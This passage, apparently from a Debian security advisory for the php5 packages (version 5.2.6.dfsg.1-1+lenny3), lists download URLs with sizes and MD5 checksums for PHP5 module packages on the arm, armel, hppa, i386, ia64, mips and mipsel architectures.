http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 24974 ef18b9f5b910ad90e4edf26e75277b26\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 2439774 3869ac0307bd7d203779109ac4991326\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 34482 573d1c55bda69385638ce10badad25c3\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 12458106 bb57e14d56b887aab4e66890f1d19d09\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 16064 33dfc57163bf769b05d0ec6541a257c7\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 13866 5718d2d7f7e467d45f2506025206b617\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 12788 d24946f45e393af9591cb22ce59aa2b3\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 32766 1e377a317fa18c8c7427be084496af28\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 12488 86cf842dd35e7d39399f56aac794de2c\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 365138 9d1e080fbfabc0a17330fa131f21487f\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 4968 bf8f16ad08ae817b944f373c1b5cfdb1\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 4748 94f08add435f9c12b56d386922fb6cc2\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 8370 3a1d6ce866160b153138fe842b0e6979\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 23664 ed6b0f4ccfe9ae0db5f4568279d6bf66\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 34234 6d90436cd54964865a27f9582b1394c6\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 51216 c7e5d4cf5b10261795d401a0c226cb2b\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 2446838 fb70395a38d624d9023d85460298233c\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 63752 806a32cb00b5d46ba4e8ec1be57b4572\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 34782 0c55c055992eeb24fe195c3cc9d0b86c\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 365240 ac5ef3bbd0dfa530fef524bb42420336\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 4847034 5a36b5886c3882bb84dabd49ceefbe7f\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 2448174 75cde1148efded71e752a643b57e6cd7\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 2441786 2568cc45c67332c8a67a77f211469d8e\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 36576 57367a49ce5c6e5f851fadd506465bf6\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 2448124 0f0991ffef0cd003d4a42bedc7cdd07e\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 18090 47efca43ed376bb56c584bf4142f2cce\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 16076 7a916d54498091f416aba69e8f413455\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 25716 6743f2f4e47bacfa1af2156700f34edc\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 365680 246c23cb2795e978c6ea9f5a9fd502e8\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 14698 844dc4f5c33c12fb29f02a966920e65e\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 8378 c4ad25a83aac7ec8eb3b6e7ebd0e0835\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 4946 e68d5dc9de2e1b357e3a103451e43998\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 33926 1bc7618ea66b116f1c3cf40461dba843\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 51074 2f66086fe1ff43f48f78cc19a62f9c8f\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 34502 2d3b27919cca86d4ffc1bb3432ed45a0\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 12611096 a96c4f8455c55b10c29d7b1ee4abe6d0\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 11296 74fe794a2b66638abce9079f2e47f3cf\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 63514 749163b778cbe8cff813151318e2fdd7\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 34454 9edccd6ec58a93fcec11093ce58093b0\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 35800 759f1906049959564c94fb231b25c0c9\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 24416 e1c0646dedda48e90db1606ca20c6cf1\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 14356 bf5d1d053cf04864392e7a996abc267f\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 367412 9b75cd1f98c3d90ef953a9fdfd21e02f\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 12304 783ed815559a52df31cf7661b923633f\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 4848990 2f7c43758731da7978ff24a89fbf1a3b\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 2449358 73b679596d4d93d5d685c2a26557ffc0\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_armel.deb\n Size/MD5 checksum: 4708 ec0fc45904ecc1f4596bec15afed0497\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 40736 f33cb2911e71a51674e8741e2ce61c08\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 2749420 beeecfb344131356eb6eff2e2e94fecf\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 74564 2ea598bc0311e9699029dd03610fdac7\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 19984 f4352dbd95e8cebbc9c8ca977d1feca0\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 14686 46b051b5a56f77e8a8098798b4602232\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 39146 38619dde3ecd29a7f7070da832cb7c7c\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 16694 07ea4bb593c81893f283cd887f2bad09\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 28958 dfd907097db9bb580047887b77a3fb8a\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 2641938 4e17eb8f25094e609fe37a441bd5a4d6\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 40134 890c40d62c7041f16fbf801de77cd235\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 12966 2cebc8946d950db50edf3e8e1eeff1ce\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 367052 f6142014a803287d591ac4ab34a5ff47\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 8830808 1b2af51642cb83aa2b77c43c2e995152\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 59434 9931ffeea8f159e1f6951f99743eead7\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 28002 8210adcfbc01fc08544b16af1d3d43ea\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 5898 cf291acd0a04a88d00df796cf3b54c6e\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 5602 ebc0dde97a1771838e303fae199508a6\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 371086 76491387601681b3b0888db105e81ac3\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 41554 94fbd4fddd6e1803800a531b1ce12746\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 5248612 b43c8ccdb61309e8249ddf4e914e4191\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 9726 bf79d26dde940a516a497b1187640ed2\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 39018 dfef44dd259843297fd45ec5e091d85a\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 15670 e8b6a5acf8ff6b38de625a235bcd3935\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 2748260 ce830fe8c690e0214ceee078f9778147\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_hppa.deb\n Size/MD5 checksum: 21302 389bfc63e99e9cbaa43127bc06665fe8\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 18200 03972992f934da8f6aeb6f2cca4dd5fd\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 5126 9dbfbd5ce57e75164efc6cb235d3cfa5\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 2483986 1be4c2f4c2c744b62daee0050143911a\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 34702 62f3e86d2625349af25b62a920e21d85\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 2482644 6bcd2508df82ca5f64e735ea63edb0b8\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 32356 97097ecd55e89dc78c43dd8203c00ab0\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 12792 657051063ff05d5597af23a9ea697997\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 4828 2ee8b7a5816945297a77ac7a5a79ae97\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 366788 5f245e6a03d0315a45f9b98b9ca2af23\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 45136 f26b12264c47176f61b9e59bce3ba474\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 2474654 f0f2f18d1df04aab14eda7c7026879d6\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 34568 8a960581290c54dd95786c6f5090ec4b\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 37656 6eb754917adb072091cc80cf7579ffb6\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 12886 0835c4f17a2b20ecce12f8dcb3714aeb\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 23722 f4f7a7bf8352e362d20a8ddc89b65eea\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 11564 2b13e97918ae06538c531f1ac2551946\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 65628 40b3c044fc5d2d984753a10f51ccccc6\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 4909730 59fd55575b063c57155f64dd6071a59c\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 34154 9d7cf22aab3efe54bf04234a894b4359\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 8485794 cdaffbf77b10e9432d63c54cba212509\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 25012 4572f8c5944ce82a56009dcba26fe975\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 16572 e97a5b3a5fc375309abd4dadb1198024\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 363180 0ac60aa6e71eb91967f9994b11548d36\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 52364 553e422b3e6195d1b28a2fc047228272\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 14160 5b03292b3addc6e51e02ca914454d051\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_i386.deb\n Size/MD5 checksum: 8436 8a1b84dd90bd2efbf4d76a9ee288f900\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 50636 df9fa2474b1eb2427f02cdf23f26505d\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 18600 0f15eae062eb3680342c96bcf8e250f6\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 26678 739c289f9981dad4ab8be25de4814040\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 97418 d970c3f1a552ce490fc4ddc7ecf53eed\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 54920 834f8865b35c5e318ddfc3b1df3ab5e7\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 362744 9622323f0971e0f78201673073db348c\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 34382 f34c3b8fdbeb137d2c4e4f4f0d5e2d68\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 51776 bf02b09da989438877160a49a46743fc\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 20526 4c2eb2be72ace2e64c37ef0cbb18c99d\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 6610622 098132e4ce093e8b410c982673a2ccb5\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 18186 4170afb463a3b6f9bf931de6efec764b\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 11950 fb96fc4f5501a5f8bd7dd1f06be4327e\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 3379682 87bee2433d8cb500dad6e56945616c5e\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 54634 38095cd75904d4034981bf56f19c5702\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 6234 b0246dbe2fbb34be510fc714ec7820f8\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 38224 e1c8aae39f696ac46486e7df470fca65\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 15846 9bf65e7619421406073ed34d7bb003da\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 50862 bf81161931168566a947db412aeecba6\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 24684 d57d53449cff02bd204317f75c89f45e\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 3377378 e5237ffb1957f53c2f61a2d117ce0e7d\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 383616 ead507c100d8bceffa3cdf46c10846d9\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 6542 11859d19492fe8d23191223758c4969d\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 17615940 7da664c6a7abb8ad27d750fbf8d7c51b\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 80456 ea54885ed923fe7db3d99f42d7313451\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_ia64.deb\n Size/MD5 checksum: 3324810 e2c0185359aac47366d74ffcbe6d7b18\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 12370 c7df846c5a1c96dcaa2a8ab25d0c734d\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 33802 2b06e4163cd89e9dc2dd6d2d5b1c549f\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 32420 d2a83265d61bdc464dbf6fed555177c5\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 8280 e5614cfc506bc38b3e384d5f13c63e93\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 365930 833f32ef30d85836b3e0ff835da48ad9\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 4960484 ae26c572724e5bb00a031d25e3cf9c56\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 16028 7afaf657e3e5986407bd0e62d3cc0cf2\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 32340 c74296f000684e11c4cf02dd38b8e674\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 2520660 2cffc25df8d5525fa00bcae563c8b660\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 24900 b04684aef1fd563d064bb2347ff335de\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 12924 c0c92df64353f652e75bd88fd516dff9\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 362864 9d44905fcc1b476f57c8b9fe51baa119\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 18426 f0b30634a92e95370653dc64ce1f516d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 51122 9a84342646cd054676257817b69e74f9\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 5304 98034e9fd6f10df205e51a68d08d2861\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 9446130 eeaff147c7153b3317b06b05e6a95a75\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 5002 ced3345c2993c3f9d8c10a9a7546bf6f\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 23192 eab36b7a4fd91ade6d90b047fde42ba5\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 63516 3f3bd60a61ace778bf4539c69e16ade4\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 2491762 aca8c5d9a48fe4167b833bf2cec509d9\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 2519060 f44a149a9d8e799abf8d82053d10db83\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 35498 5f7fa5c897bcc493119439fc721c840b\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 11508 1194b41152bdf03addff830a199b6ae7\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 13302 ab380e26e504be58ad29acdf59d1669f\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_mips.deb\n Size/MD5 checksum: 35776 3b7351942ffef746b49684cce9fa89bd\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 33566 84b9fe4889bd6a34eb193feed16d7b94\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 13202 0405d95601a6fe7837f3cd1cc6853287\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 2476526 7d8c5af525c5664f71ad07b08e63209d\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 4990 29142a37738e81b5e1d631ed6e3e2875\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 32260 0997f248adddd23ed415cd6bbd55735a\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 31794 87ea44868934417418ce97de380a10dd\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 12836 842b17ac23f91f85a959b56bbdcb0c4d\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_mipsel.deb\n Size/MD5 checksum: 2477602 b69fcc9c0174e695ec434afc6c4d14f4\n 